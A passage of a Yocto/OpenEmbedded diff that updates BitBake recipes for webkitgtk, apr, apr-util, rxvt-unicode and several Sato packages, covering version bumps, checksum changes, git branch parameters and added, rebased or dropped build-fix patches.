LIC_FILES_CHKSUM = "file://LICENCE;md5=6099f4981f9461d7f411091e69a7f07a"
@@ -8,7 +9,7 @@ DEPENDS = "libxt"
# The libxt requires x11 in DISTRO_FEATURES
REQUIRED_DISTRO_FEATURES = "x11"
-SRC_URI = "git://git.tartarus.org/simon/puzzles.git \
+SRC_URI = "git://git.tartarus.org/simon/puzzles.git;branch=main \
file://fix-compiling-failure-with-option-g-O.patch \
file://0001-palisade-Fix-warnings-with-clang-on-arm.patch \
file://0001-Use-Wno-error-format-overflow-if-the-compiler-suppor.patch \
diff --git a/meta/recipes-sato/rxvt-unicode/rxvt-unicode.inc b/meta/recipes-sato/rxvt-unicode/rxvt-unicode.inc
index b568f04580..0e5bcbe480 100644
--- a/meta/recipes-sato/rxvt-unicode/rxvt-unicode.inc
+++ b/meta/recipes-sato/rxvt-unicode/rxvt-unicode.inc
@@ -5,6 +5,7 @@ terminal emulator rxvt, modified to store text in Unicode \
(either UCS-2 or UCS-4) and to use locale-correct input and \
output. It also supports mixing multiple fonts at the \
same time, including Xft fonts."
+HOMEPAGE = "https://rxvt.org/"
DEPENDS = "virtual/libx11 libxt libxft gdk-pixbuf libxmu"
SRC_URI = "http://dist.schmorp.de/rxvt-unicode/Attic/rxvt-unicode-${PV}.tar.bz2 \
diff --git a/meta/recipes-sato/rxvt-unicode/rxvt-unicode/0001-libev-remove-deprecated-throw-specification.patch b/meta/recipes-sato/rxvt-unicode/rxvt-unicode/0001-libev-remove-deprecated-throw-specification.patch
new file mode 100644
index 0000000000..f10dca09d6
--- /dev/null
+++ b/meta/recipes-sato/rxvt-unicode/rxvt-unicode/0001-libev-remove-deprecated-throw-specification.patch
@@ -0,0 +1,30 @@
+From 9a8f1d73e7b7e183768a8379ef32429a84f0e5c2 Mon Sep 17 00:00:00 2001
+From: Khem Raj <raj.khem@gmail.com>
+Date: Fri, 26 Feb 2021 18:11:56 -0800
+Subject: [PATCH] libev: remove deprecated throw specification
+
+removes the throw specifications that are deprecated since C++11:
+warning: dynamic exception specifications are deprecated in C++11 [-Wdeprecated]
+
+Upstream-Status: Pending
+Signed-off-by: Khem Raj <raj.khem@gmail.com>
+---
+ libev/ev++.h | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/libev/ev++.h b/libev/ev++.h
+index 4f0a36a..85ddf44 100644
+--- a/libev/ev++.h
++++ b/libev/ev++.h
+@@ -376,7 +376,7 @@ namespace ev {
+
+ struct default_loop : loop_ref
+ {
+- default_loop (unsigned int flags = AUTO) throw (bad_loop)
++ default_loop (unsigned int flags = AUTO)
+ #if EV_MULTIPLICITY
+ : loop_ref (ev_default_loop (flags))
+ #endif
+--
+2.30.1
+
diff --git a/meta/recipes-sato/rxvt-unicode/rxvt-unicode_9.22.bb b/meta/recipes-sato/rxvt-unicode/rxvt-unicode_9.22.bb
index bfa8a614df..283e8d7751 100644
--- a/meta/recipes-sato/rxvt-unicode/rxvt-unicode_9.22.bb
+++ b/meta/recipes-sato/rxvt-unicode/rxvt-unicode_9.22.bb
@@ -4,5 +4,7 @@ LICENSE = "GPLv3"
LIC_FILES_CHKSUM = "file://COPYING;md5=d32239bcb673463ab874e80d47fae504 \
file://src/main.C;beginline=1;endline=31;md5=d3600d7ee1062667fcd1193fbe6485f6"
-SRC_URI[md5sum] = "93782dec27494eb079467dacf6e48185"
+SRC_URI += "file://0001-libev-remove-deprecated-throw-specification.patch"
+
SRC_URI[sha256sum] = "e94628e9bcfa0adb1115d83649f898d6edb4baced44f5d5b769c2eeb8b95addd"
+
diff --git a/meta/recipes-sato/sato-screenshot/sato-screenshot_0.3.bb b/meta/recipes-sato/sato-screenshot/sato-screenshot_0.3.bb
index 2b1f513f1c..7e7612253d 100644
--- a/meta/recipes-sato/sato-screenshot/sato-screenshot_0.3.bb
+++ b/meta/recipes-sato/sato-screenshot/sato-screenshot_0.3.bb
@@ -11,7 +11,7 @@ DEPENDS = "matchbox-panel-2 gtk+3"
# SRCREV tagged 0.3
SRCREV = "9250fa5a012d84ff45984e8c4345ee7635227756"
-SRC_URI = "git://git.yoctoproject.org/screenshot"
+SRC_URI = "git://git.yoctoproject.org/screenshot;branch=master"
UPSTREAM_CHECK_GITTAGREGEX = "(?P<pver>(\d+(\.\d+)+))"
S = "${WORKDIR}/git"
diff --git a/meta/recipes-sato/settings-daemon/settings-daemon_0.0.2.bb b/meta/recipes-sato/settings-daemon/settings-daemon_0.0.2.bb
index d01177f9b9..19c4a73dc3 100644
--- a/meta/recipes-sato/settings-daemon/settings-daemon_0.0.2.bb
+++ b/meta/recipes-sato/settings-daemon/settings-daemon_0.0.2.bb
@@ -9,7 +9,7 @@ SECTION = "x11"
# SRCREV tagged 0.0.2
SRCREV = "b2e5da502f8c5ff75e9e6da771372ef8e40fd9a2"
-SRC_URI = "git://git.yoctoproject.org/xsettings-daemon \
+SRC_URI = "git://git.yoctoproject.org/xsettings-daemon;branch=master \
file://addsoundkeys.patch \
file://70settings-daemon.sh \
"
diff --git a/meta/recipes-sato/webkit/webkitgtk/0001-MiniBrowser-Fix-reproduciblity.patch b/meta/recipes-sato/webkit/webkitgtk/0001-MiniBrowser-Fix-reproduciblity.patch
new file mode 100644
index 0000000000..528dec8c8b
--- /dev/null
+++ b/meta/recipes-sato/webkit/webkitgtk/0001-MiniBrowser-Fix-reproduciblity.patch
@@ -0,0 +1,31 @@
+From dcf9ae0dc0b4510eddbeeea09e11edfb123f95af Mon Sep 17 00:00:00 2001
+From: Khem Raj <raj.khem@gmail.com>
+Date: Sun, 2 May 2021 13:10:49 -0700
+Subject: [PATCH] MiniBrowser: Fix reproduciblity
+
+Do not emit references to source dir in generated sourcecode
+
+Upstream-Status: Submitted [https://bugs.webkit.org/show_bug.cgi?id=225283]
+Signed-off-by: Khem Raj <raj.khem@gmail.com>
+---
+ Tools/MiniBrowser/gtk/CMakeLists.txt | 4 ++--
+ 1 file changed, 2 insertions(+), 2 deletions(-)
+
+diff --git a/Tools/MiniBrowser/gtk/CMakeLists.txt b/Tools/MiniBrowser/gtk/CMakeLists.txt
+index 93b62521..482d3b00 100644
+--- a/Tools/MiniBrowser/gtk/CMakeLists.txt
++++ b/Tools/MiniBrowser/gtk/CMakeLists.txt
+@@ -48,8 +48,8 @@ add_custom_command(
+ OUTPUT ${DERIVED_SOURCES_MINIBROWSER_DIR}/BrowserMarshal.c
+ ${DERIVED_SOURCES_MINIBROWSER_DIR}/BrowserMarshal.h
+ MAIN_DEPENDENCY ${MINIBROWSER_DIR}/browser-marshal.list
+- COMMAND glib-genmarshal --prefix=browser_marshal ${MINIBROWSER_DIR}/browser-marshal.list --body > ${DERIVED_SOURCES_MINIBROWSER_DIR}/BrowserMarshal.c
+- COMMAND glib-genmarshal --prefix=browser_marshal ${MINIBROWSER_DIR}/browser-marshal.list --header > ${DERIVED_SOURCES_MINIBROWSER_DIR}/BrowserMarshal.h
++ COMMAND glib-genmarshal --prefix=browser_marshal ${MINIBROWSER_DIR}/browser-marshal.list --body --skip-source > ${DERIVED_SOURCES_MINIBROWSER_DIR}/BrowserMarshal.c
++ COMMAND glib-genmarshal --prefix=browser_marshal ${MINIBROWSER_DIR}/browser-marshal.list --header --skip-source > ${DERIVED_SOURCES_MINIBROWSER_DIR}/BrowserMarshal.h
+ VERBATIM)
+
+ if (DEVELOPER_MODE)
+--
+2.31.1
+
diff --git a/meta/recipes-sato/webkit/webkitgtk/0001-clang-11-fix-build-errors-due-to-WWc-11-narrowing.patch b/meta/recipes-sato/webkit/webkitgtk/0001-clang-11-fix-build-errors-due-to-WWc-11-narrowing.patch
new file mode 100644
index 0000000000..d8bb8efb88
--- /dev/null
+++ b/meta/recipes-sato/webkit/webkitgtk/0001-clang-11-fix-build-errors-due-to-WWc-11-narrowing.patch
@@ -0,0 +1,66 @@
+From cb929f59b527fe890376e47613dfe1434a320bc0 Mon Sep 17 00:00:00 2001
+From: Khem Raj <raj.khem@gmail.com>
+Date: Tue, 11 Aug 2020 15:44:48 -0700
+Subject: [PATCH] [clang 11] fix build errors due to -WWc++11-narrowing
+
+https://bugs.webkit.org/show_bug.cgi?id=211193
+
+Reviewed by Adrian Perez de Castro.
+
+Fixes the following errors,
+
+Source/WebCore/html/MediaElementSession.cpp:1059:9: error: type 'WebCore::RenderMedia *' cannot be narrowed to 'bool' in initializer list [-Wc++11-narrowing]
+m_element.renderer(),
+^~~~~~~~~~~~~~~~~~~~
+
+Source/WebCore/style/StyleResolver.cpp:106:55: error: type 'const char [4]' cannot be narrowed to 'bool' in initializer list [-Wc++11-narrowing]
+m_mediaQueryEvaluator = MediaQueryEvaluator { "all" };
+ ^~~~~
+Source/WebCore/style/StyleResolver.cpp:106:55: note: insert an explicit cast to silence this issue
+m_mediaQueryEvaluator = MediaQueryEvaluator { "all" };
+ ^~~~~
+ static_cast<bool>( )
+
+* html/HTMLMediaElement.h:
+(WebCore::HTMLMediaElement::hasRenderer const):
+MediaElementSession was implicitly casting a pointer to a bool,
+which is not allowed with modern Clang checks. Add a helper method
+to encapsulate the now required static_cast<bool>.
+* html/MediaElementSession.cpp: Use the new helper method to see
+if the HTMLMediaElement has an associated renderer.
+(WebCore::MediaElementSession::updateMediaUsageIfChanged):
+* style/StyleResolver.cpp: This was calling MediaQueryEvaluator {
+"all" }; and seemingly expecting to cast a const char[] to a bool,
+or maybe String? It's confusing because of the MediaQueryEvaluator
+API. If it was implicitly converting to bool then that could be
+unintentional. Such casts are not allowed either now. The
+MediaQueryEvaluator's default constructor says it returns true for
+"all", which appears to be the original intent of this call, so I
+replaced it with that.
+(WebCore::Style::Resolver::Resolver):
+
+git-svn-id: http://svn.webkit.org/repository/webkit/trunk@260951 268f45cc-cd09-0410-ab3c-d52691b4dbfc
+
+Upstream-Status: Backport [https://github.com/WebKit/webkit/commit/c3cf651016e4cdcb4350598d4a586821071f91bf.patch]
+
+Signed-off-by: Khem Raj <raj.khem@gmail.com>
+---
+ Source/WebCore/style/StyleResolver.cpp | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/Source/WebCore/style/StyleResolver.cpp b/Source/WebCore/style/StyleResolver.cpp
+index 8bf371a0..34580ddb 100644
+--- a/Source/WebCore/style/StyleResolver.cpp
++++ b/Source/WebCore/style/StyleResolver.cpp
+@@ -107,7 +107,7 @@ Resolver::Resolver(Document& document)
+ if (view)
+ m_mediaQueryEvaluator = MediaQueryEvaluator { view->mediaType() };
+ else
+- m_mediaQueryEvaluator = MediaQueryEvaluator { "all" };
++ m_mediaQueryEvaluator = MediaQueryEvaluator { };
+
+ if (root) {
+ m_rootDefaultStyle = styleForElement(*root, m_document.renderStyle(), nullptr, RuleMatchingBehavior::MatchOnlyUserAgentRules).renderStyle;
+--
+2.28.0
+
diff --git a/meta/recipes-sato/webkit/webkitgtk/CVE-2020-13753.patch b/meta/recipes-sato/webkit/webkitgtk/CVE-2020-13753.patch
deleted file mode 100644
index d8504c2b36..0000000000
--- a/meta/recipes-sato/webkit/webkitgtk/CVE-2020-13753.patch
+++ /dev/null
@@ -1,15 +0,0 @@
-Upstream-Status: Backport [https://trac.webkit.org/changeset/262368/webkit?format=diff&new=262368]
-CVE: CVE-2020-13753
-Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
-
-Index: a/Source/WebKit/UIProcess/Launcher/glib/BubblewrapLauncher.cpp
-===================================================================
---- a/Source/WebKit/UIProcess/Launcher/glib/BubblewrapLauncher.cpp (revision 262367)
-+++ b/Source/WebKit/UIProcess/Launcher/glib/BubblewrapLauncher.cpp (revision 262368)
-@@ -642,5 +642,5 @@
- int r;
- if (rule.arg)
-- r = seccomp_rule_add(seccomp, SCMP_ACT_ERRNO(EPERM), scall, 1, rule.arg);
-+ r = seccomp_rule_add(seccomp, SCMP_ACT_ERRNO(EPERM), scall, 1, *rule.arg);
- else
- r = seccomp_rule_add(seccomp, SCMP_ACT_ERRNO(EPERM), scall, 0);
diff --git a/meta/recipes-sato/webkit/webkitgtk_2.28.2.bb b/meta/recipes-sato/webkit/webkitgtk_2.28.4.bb
index 9cfec83ec7..2e3f0aa682 100644
--- a/meta/recipes-sato/webkit/webkitgtk_2.28.2.bb
+++ b/meta/recipes-sato/webkit/webkitgtk_2.28.4.bb
@@ -19,10 +19,10 @@ SRC_URI = "https://www.webkitgtk.org/releases/${BPN}-${PV}.tar.xz \
file://cross-compile.patch \
file://0001-Fix-build-with-musl.patch \
file://include_array.patch \
- file://CVE-2020-13753.patch \
+ file://0001-clang-11-fix-build-errors-due-to-WWc-11-narrowing.patch \
+ file://0001-MiniBrowser-Fix-reproduciblity.patch \
"
-SRC_URI[md5sum] = "ec0ef870ca37e3a5ebbead2f268a28ec"
-SRC_URI[sha256sum] = "b9d23525cfd8d22c37b5d964a9fe9a8ce7583042a2f8d3922e71e6bbc68c30bd"
+SRC_URI[sha256sum] = "821952e8c9303ed752f1fb1d4283f612c25249d00d705d2b79c2db1bc49c9464"
inherit cmake pkgconfig gobject-introspection perlnative features_check upstream-version-is-even gtk-doc
@@ -131,3 +131,15 @@ GI_DATA_ENABLED_libc-musl_armv7ve = "False"
# Can't be built with ccache
CCACHE_DISABLE = "1"
+
+PACKAGE_PREPROCESS_FUNCS += "src_package_preprocess"
+src_package_preprocess () {
+ # Trim build paths from comments in generated sources to ensure reproducibility
+ sed -i -e "s,${WORKDIR},,g" \
+ ${B}/DerivedSources/webkit2gtk/webkit2/*.cpp \
+ ${B}/DerivedSources/ForwardingHeaders/JavaScriptCore/*.h \
+ ${B}/DerivedSources/JavaScriptCore/*.h \
+ ${B}/DerivedSources/JavaScriptCore/yarr/*.h \
+ ${B}/DerivedSources/MiniBrowser/*.c
+}
+
diff --git a/meta/recipes-sato/webkit/wpebackend-fdo_1.4.1.bb b/meta/recipes-sato/webkit/wpebackend-fdo_1.4.1.bb
index cd2f7fabda..165fc74dde 100644
--- a/meta/recipes-sato/webkit/wpebackend-fdo_1.4.1.bb
+++ b/meta/recipes-sato/webkit/wpebackend-fdo_1.4.1.bb
@@ -15,3 +15,6 @@ REQUIRED_DISTRO_FEATURES = "opengl"
SRC_URI = "https://wpewebkit.org/releases/${BPN}-${PV}.tar.xz"
SRC_URI[sha256sum] = "6249a0b7cbfa662206a8d2fa24e2c574e75c681ad0e93468091f1dc68ddb299d"
+FILES_${PN} += "${libdir}/libWPEBackend-fdo-1.0.so"
+FILES_SOLIBSDEV = ""
+INSANE_SKIP_${PN} += "dev-so"
diff --git a/meta/recipes-support/apr/apr-util/0001-Fix-error-handling-in-gdbm.patch b/meta/recipes-support/apr/apr-util/0001-Fix-error-handling-in-gdbm.patch
deleted file mode 100644
index 57e7453312..0000000000
--- a/meta/recipes-support/apr/apr-util/0001-Fix-error-handling-in-gdbm.patch
+++ /dev/null
@@ -1,135 +0,0 @@
-From 6b638fa9afbeb54dfa19378e391465a5284ce1ad Mon Sep 17 00:00:00 2001
-From: Changqing Li <changqing.li@windriver.com>
-Date: Wed, 12 Sep 2018 17:16:36 +0800
-Subject: [PATCH] Fix error handling in gdbm
-
-Only check for gdbm_errno if the return value of the called gdbm_*
-function says so. This fixes apr-util with gdbm 1.14, which does not
-seem to always reset gdbm_errno.
-
-Also make the gdbm driver return error codes starting with
-APR_OS_START_USEERR instead of always returning APR_EGENERAL. This is
-what the berkleydb driver already does.
-
-Also ensure that dsize is 0 if dptr == NULL.
-
-Upstream-Status: Backport[https://svn.apache.org/viewvc?
-view=revision&amp;revision=1825311]
-
-Signed-off-by: Changqing Li <changqing.li@windriver.com>
----
- dbm/apr_dbm_gdbm.c | 47 +++++++++++++++++++++++++++++------------------
- 1 file changed, 29 insertions(+), 18 deletions(-)
-
-diff --git a/dbm/apr_dbm_gdbm.c b/dbm/apr_dbm_gdbm.c
-index 749447a..1c86327 100644
---- a/dbm/apr_dbm_gdbm.c
-+++ b/dbm/apr_dbm_gdbm.c
-@@ -36,13 +36,25 @@
- static apr_status_t g2s(int gerr)
- {
- if (gerr == -1) {
-- /* ### need to fix this */
-- return APR_EGENERAL;
-+ if (gdbm_errno == GDBM_NO_ERROR)
-+ return APR_SUCCESS;
-+ return APR_OS_START_USEERR + gdbm_errno;
- }
-
- return APR_SUCCESS;
- }
-
-+static apr_status_t gdat2s(datum d)
-+{
-+ if (d.dptr == NULL) {
-+ if (gdbm_errno == GDBM_NO_ERROR || gdbm_errno == GDBM_ITEM_NOT_FOUND)
-+ return APR_SUCCESS;
-+ return APR_OS_START_USEERR + gdbm_errno;
-+ }
-+
-+ return APR_SUCCESS;
-+}
-+
- static apr_status_t datum_cleanup(void *dptr)
- {
- if (dptr)
-@@ -53,22 +65,15 @@ static apr_status_t datum_cleanup(void *dptr)
-
- static apr_status_t set_error(apr_dbm_t *dbm, apr_status_t dbm_said)
- {
-- apr_status_t rv = APR_SUCCESS;
-
-- /* ### ignore whatever the DBM said (dbm_said); ask it explicitly */
-+ dbm->errcode = dbm_said;
-
-- if ((dbm->errcode = gdbm_errno) == GDBM_NO_ERROR) {
-+ if (dbm_said == APR_SUCCESS)
- dbm->errmsg = NULL;
-- }
-- else {
-- dbm->errmsg = gdbm_strerror(gdbm_errno);
-- rv = APR_EGENERAL; /* ### need something better */
-- }
--
-- /* captured it. clear it now. */
-- gdbm_errno = GDBM_NO_ERROR;
-+ else
-+ dbm->errmsg = gdbm_strerror(dbm_said - APR_OS_START_USEERR);
-
-- return rv;
-+ return dbm_said;
- }
-
- /* --------------------------------------------------------------------------
-@@ -107,7 +112,7 @@ static apr_status_t vt_gdbm_open(apr_dbm_t **pdb, const char *pathname,
- NULL);
-
- if (file == NULL)
-- return APR_EGENERAL; /* ### need a better error */
-+ return APR_OS_START_USEERR + gdbm_errno; /* ### need a better error */
-
- /* we have an open database... return it */
- *pdb = apr_pcalloc(pool, sizeof(**pdb));
-@@ -141,10 +146,12 @@ static apr_status_t vt_gdbm_fetch(apr_dbm_t *dbm, apr_datum_t key,
- if (pvalue->dptr)
- apr_pool_cleanup_register(dbm->pool, pvalue->dptr, datum_cleanup,
- apr_pool_cleanup_null);
-+ else
-+ pvalue->dsize = 0;
-
- /* store the error info into DBM, and return a status code. Also, note
- that *pvalue should have been cleared on error. */
-- return set_error(dbm, APR_SUCCESS);
-+ return set_error(dbm, gdat2s(rd));
- }
-
- static apr_status_t vt_gdbm_store(apr_dbm_t *dbm, apr_datum_t key,
-@@ -201,9 +208,11 @@ static apr_status_t vt_gdbm_firstkey(apr_dbm_t *dbm, apr_datum_t *pkey)
- if (pkey->dptr)
- apr_pool_cleanup_register(dbm->pool, pkey->dptr, datum_cleanup,
- apr_pool_cleanup_null);
-+ else
-+ pkey->dsize = 0;
-
- /* store any error info into DBM, and return a status code. */
-- return set_error(dbm, APR_SUCCESS);
-+ return set_error(dbm, gdat2s(rd));
- }
-
- static apr_status_t vt_gdbm_nextkey(apr_dbm_t *dbm, apr_datum_t *pkey)
-@@ -221,9 +230,11 @@ static apr_status_t vt_gdbm_nextkey(apr_dbm_t *dbm, apr_datum_t *pkey)
- if (pkey->dptr)
- apr_pool_cleanup_register(dbm->pool, pkey->dptr, datum_cleanup,
- apr_pool_cleanup_null);
-+ else
-+ pkey->dsize = 0;
-
- /* store any error info into DBM, and return a status code. */
-- return set_error(dbm, APR_SUCCESS);
-+ return set_error(dbm, gdat2s(rd));
- }
-
- static void vt_gdbm_freedatum(apr_dbm_t *dbm, apr_datum_t data)
---
-2.7.4
-
diff --git a/meta/recipes-support/apr/apr-util_1.6.1.bb b/meta/recipes-support/apr/apr-util_1.6.3.bb
index 0dd8f025e8..3d9d619c7b 100644
--- a/meta/recipes-support/apr/apr-util_1.6.1.bb
+++ b/meta/recipes-support/apr/apr-util_1.6.3.bb
@@ -13,16 +13,13 @@ SRC_URI = "${APACHE_MIRROR}/apr/${BPN}-${PV}.tar.gz \
file://configfix.patch \
file://configure_fixes.patch \
file://run-ptest \
- file://0001-Fix-error-handling-in-gdbm.patch \
-"
+ "
-SRC_URI[md5sum] = "bd502b9a8670a8012c4d90c31a84955f"
-SRC_URI[sha256sum] = "b65e40713da57d004123b6319828be7f1273fbc6490e145874ee1177e112c459"
+SRC_URI[sha256sum] = "2b74d8932703826862ca305b094eef2983c27b39d5c9414442e9976a9acf1983"
-EXTRA_OECONF = "--with-apr=${STAGING_BINDIR_CROSS}/apr-1-config \
+EXTRA_OECONF = "--with-apr=${STAGING_BINDIR_CROSS}/apr-1-config \
--without-odbc \
--without-pgsql \
- --with-dbm=gdbm \
--without-sqlite2 \
--with-expat=${STAGING_DIR_HOST}${prefix}"
@@ -36,6 +33,7 @@ OE_BINCONFIG_EXTRA_MANGLE = " -e 's:location=source:location=installed:'"
do_configure_append() {
if [ "${CLASSOVERRIDE}" = "class-target" ]; then
cp ${STAGING_DATADIR}/apr/apr_rules.mk ${B}/build/rules.mk
+ sed -i -e 's#^CFLAGS=.*#CFLAGS=${TARGET_CFLAGS}#g' ${B}/build/rules.mk
fi
}
do_configure_prepend_class-native() {
@@ -50,6 +48,7 @@ do_configure_append_class-native() {
do_configure_prepend_class-nativesdk() {
cp ${STAGING_DATADIR}/apr/apr_rules.mk ${S}/build/rules.mk
+ sed -i -e 's#^CFLAGS=.*#CFLAGS=${TARGET_CFLAGS}#g' ${S}/build/rules.mk
}
do_configure_append_class-nativesdk() {
@@ -69,7 +68,7 @@ PACKAGECONFIG ??= "crypto gdbm"
PACKAGECONFIG[ldap] = "--with-ldap,--without-ldap,openldap"
PACKAGECONFIG[crypto] = "--with-openssl=${STAGING_DIR_HOST}${prefix} --with-crypto,--without-crypto,openssl"
PACKAGECONFIG[sqlite3] = "--with-sqlite3=${STAGING_DIR_HOST}${prefix},--without-sqlite3,sqlite3"
-PACKAGECONFIG[gdbm] = "--with-gdbm=${STAGING_DIR_HOST}${prefix},--without-gdbm,gdbm"
+PACKAGECONFIG[gdbm] = "--with-dbm=gdbm --with-gdbm=${STAGING_DIR_HOST}${prefix},--without-gdbm,gdbm"
#files ${libdir}/apr-util-1/*.so are not symlinks but loadable modules thus they are packaged in ${PN}
FILES_${PN} += "${libdir}/apr-util-1/apr*${SOLIBS} ${libdir}/apr-util-1/apr*${SOLIBSDEV}"
diff --git a/meta/recipes-support/apr/apr/0001-Add-option-to-disable-timed-dependant-tests.patch b/meta/recipes-support/apr/apr/0001-Add-option-to-disable-timed-dependant-tests.patch
index abff4e9331..a274f3a16e 100644
--- a/meta/recipes-support/apr/apr/0001-Add-option-to-disable-timed-dependant-tests.patch
+++ b/meta/recipes-support/apr/apr/0001-Add-option-to-disable-timed-dependant-tests.patch
@@ -1,14 +1,15 @@
-From 2bbe20b4f69e84e7a18bc79d382486953f479328 Mon Sep 17 00:00:00 2001
+From 225abf37cd0b49960664b59f08e515a4c4ea5ad0 Mon Sep 17 00:00:00 2001
From: Jeremy Puhlman <jpuhlman@mvista.com>
Date: Thu, 26 Mar 2020 18:30:36 +0000
Subject: [PATCH] Add option to disable timed dependant tests
-The disabled tests rely on timing to pass correctly. On a virtualized
+The disabled tests rely on timing to pass correctly. On a virtualized
system under heavy load, these tests randomly fail because they miss
a timer or other timing related issues.
Upstream-Status: Pending
Signed-off-by: Jeremy Puhlman <jpuhlman@mvista.com>
+
---
configure.in | 6 ++++++
include/apr.h.in | 1 +
@@ -16,10 +17,10 @@ Signed-off-by: Jeremy Puhlman <jpuhlman@mvista.com>
3 files changed, 9 insertions(+), 2 deletions(-)
diff --git a/configure.in b/configure.in
-index d9f32d6..f0c5661 100644
+index bfd488b..3663220 100644
--- a/configure.in
+++ b/configure.in
-@@ -2886,6 +2886,12 @@ AC_ARG_ENABLE(timedlocks,
+@@ -3023,6 +3023,12 @@ AC_ARG_ENABLE(timedlocks,
)
AC_SUBST(apr_has_timedlocks)
@@ -45,10 +46,10 @@ index ee99def..c46a5f4 100644
#define APR_PROCATTR_USER_SET_REQUIRES_PASSWORD @apr_procattr_user_set_requires_password@
diff --git a/test/testlock.c b/test/testlock.c
-index a43f477..6233d0b 100644
+index e3437c1..04e01b9 100644
--- a/test/testlock.c
+++ b/test/testlock.c
-@@ -396,13 +396,13 @@ abts_suite *testlock(abts_suite *suite)
+@@ -535,7 +535,7 @@ abts_suite *testlock(abts_suite *suite)
abts_run_test(suite, threads_not_impl, NULL);
#else
abts_run_test(suite, test_thread_mutex, NULL);
@@ -56,6 +57,8 @@ index a43f477..6233d0b 100644
+#if APR_HAS_TIMEDLOCKS && APR_HAVE_TIME_DEPENDANT_TESTS
abts_run_test(suite, test_thread_timedmutex, NULL);
#endif
+ abts_run_test(suite, test_thread_nestedmutex, NULL);
+@@ -543,7 +543,7 @@ abts_suite *testlock(abts_suite *suite)
abts_run_test(suite, test_thread_rwlock, NULL);
abts_run_test(suite, test_cond, NULL);
abts_run_test(suite, test_timeoutcond, NULL);
@@ -63,7 +66,4 @@ index a43f477..6233d0b 100644
+#if APR_HAS_TIMEDLOCKS && APR_HAVE_TIME_DEPENDANT_TESTS
abts_run_test(suite, test_timeoutmutex, NULL);
#endif
- #endif
---
-2.23.0
-
+ #ifdef WIN32
diff --git a/meta/recipes-support/apr/apr/0001-configure-Remove-runtime-test-for-mmap-that-can-map-.patch b/meta/recipes-support/apr/apr/0001-configure-Remove-runtime-test-for-mmap-that-can-map-.patch
new file mode 100644
index 0000000000..a78b16284f
--- /dev/null
+++ b/meta/recipes-support/apr/apr/0001-configure-Remove-runtime-test-for-mmap-that-can-map-.patch
@@ -0,0 +1,58 @@
+From 316b81c462f065927d7fec56aadd5c8cb94d1cf0 Mon Sep 17 00:00:00 2001
+From: Khem Raj <raj.khem@gmail.com>
+Date: Fri, 26 Aug 2022 00:28:08 -0700
+Subject: [PATCH] configure: Remove runtime test for mmap that can map
+ /dev/zero
+
+This never works for cross-compile moreover it ends up disabling
+ac_cv_file__dev_zero which then results in compiler errors in shared
+mutexes
+
+Upstream-Status: Inappropriate [Cross-compile specific]
+Signed-off-by: Khem Raj <raj.khem@gmail.com>
+
+---
+ configure.in | 30 ------------------------------
+ 1 file changed, 30 deletions(-)
+
+diff --git a/configure.in b/configure.in
+index 3663220..dce9789 100644
+--- a/configure.in
++++ b/configure.in
+@@ -1303,36 +1303,6 @@ AC_CHECK_FUNCS([mmap munmap shm_open shm_unlink shmget shmat shmdt shmctl \
+ APR_CHECK_DEFINE(MAP_ANON, sys/mman.h)
+ AC_CHECK_FILE(/dev/zero)
+
+-# Not all systems can mmap /dev/zero (such as HP-UX). Check for that.
+-if test "$ac_cv_func_mmap" = "yes" &&
+- test "$ac_cv_file__dev_zero" = "yes"; then
+- AC_CACHE_CHECK([for mmap that can map /dev/zero],
+- [ac_cv_mmap__dev_zero],
+- [AC_TRY_RUN([#include <sys/types.h>
+-#include <sys/stat.h>
+-#include <fcntl.h>
+-#ifdef HAVE_SYS_MMAN_H
+-#include <sys/mman.h>
+-#endif
+- int main()
+- {
+- int fd;
+- void *m;
+- fd = open("/dev/zero", O_RDWR);
+- if (fd < 0) {
+- return 1;
+- }
+- m = mmap(0, sizeof(void*), PROT_READ|PROT_WRITE, MAP_SHARED, fd, 0);
+- if (m == (void *)-1) { /* aka MAP_FAILED */
+- return 2;
+- }
+- if (munmap(m, sizeof(void*)) < 0) {
+- return 3;
+- }
+- return 0;
+- }], [], [ac_cv_file__dev_zero=no], [ac_cv_file__dev_zero=no])])
+-fi
+-
+ # Now we determine which one is our anonymous shmem preference.
+ haveshmgetanon="0"
+ havemmapzero="0"
diff --git a/meta/recipes-support/apr/apr/0002-apr-Remove-workdir-path-references-from-installed-ap.patch b/meta/recipes-support/apr/apr/0002-apr-Remove-workdir-path-references-from-installed-ap.patch
index 72e706f966..d63423f3a1 100644
--- a/meta/recipes-support/apr/apr/0002-apr-Remove-workdir-path-references-from-installed-ap.patch
+++ b/meta/recipes-support/apr/apr/0002-apr-Remove-workdir-path-references-from-installed-ap.patch
@@ -1,8 +1,7 @@
-From 5925b20da8bbc34d9bf5a5dca123ef38864d43c6 Mon Sep 17 00:00:00 2001
+From 689a8db96a6d1e1cae9cbfb35d05ac82140a6555 Mon Sep 17 00:00:00 2001
From: Hongxu Jia <hongxu.jia@windriver.com>
Date: Tue, 30 Jan 2018 09:39:06 +0800
-Subject: [PATCH 2/7] apr: Remove workdir path references from installed apr
- files
+Subject: [PATCH] apr: Remove workdir path references from installed apr files
Upstream-Status: Inappropriate [configuration]
@@ -14,20 +13,23 @@ packages at target run time, the workdir path caused confusion.
Rebase to 1.6.3
Signed-off-by: Hongxu Jia <hongxu.jia@windriver.com>
+
---
- apr-config.in | 26 ++------------------------
- 1 file changed, 2 insertions(+), 24 deletions(-)
+ apr-config.in | 32 ++------------------------------
+ 1 file changed, 2 insertions(+), 30 deletions(-)
diff --git a/apr-config.in b/apr-config.in
-index 84b4073..bbbf651 100644
+index bed47ca..47874e5 100644
--- a/apr-config.in
+++ b/apr-config.in
-@@ -152,14 +152,7 @@ while test $# -gt 0; do
+@@ -164,16 +164,7 @@ while test $# -gt 0; do
flags="$flags $LDFLAGS"
;;
--includes)
- if test "$location" = "installed"; then
flags="$flags -I$includedir $EXTRA_INCLUDES"
+- elif test "$location" = "crosscompile"; then
+- flags="$flags -I$APR_TARGET_DIR/$includedir $EXTRA_INCLUDES"
- elif test "$location" = "source"; then
- flags="$flags -I$APR_SOURCE_DIR/include $EXTRA_INCLUDES"
- else
@@ -37,13 +39,15 @@ index 84b4073..bbbf651 100644
;;
--srcdir)
echo $APR_SOURCE_DIR
-@@ -181,29 +174,14 @@ while test $# -gt 0; do
+@@ -197,33 +188,14 @@ while test $# -gt 0; do
exit 0
;;
--link-ld)
- if test "$location" = "installed"; then
- ### avoid using -L if libdir is a "standard" location like /usr/lib
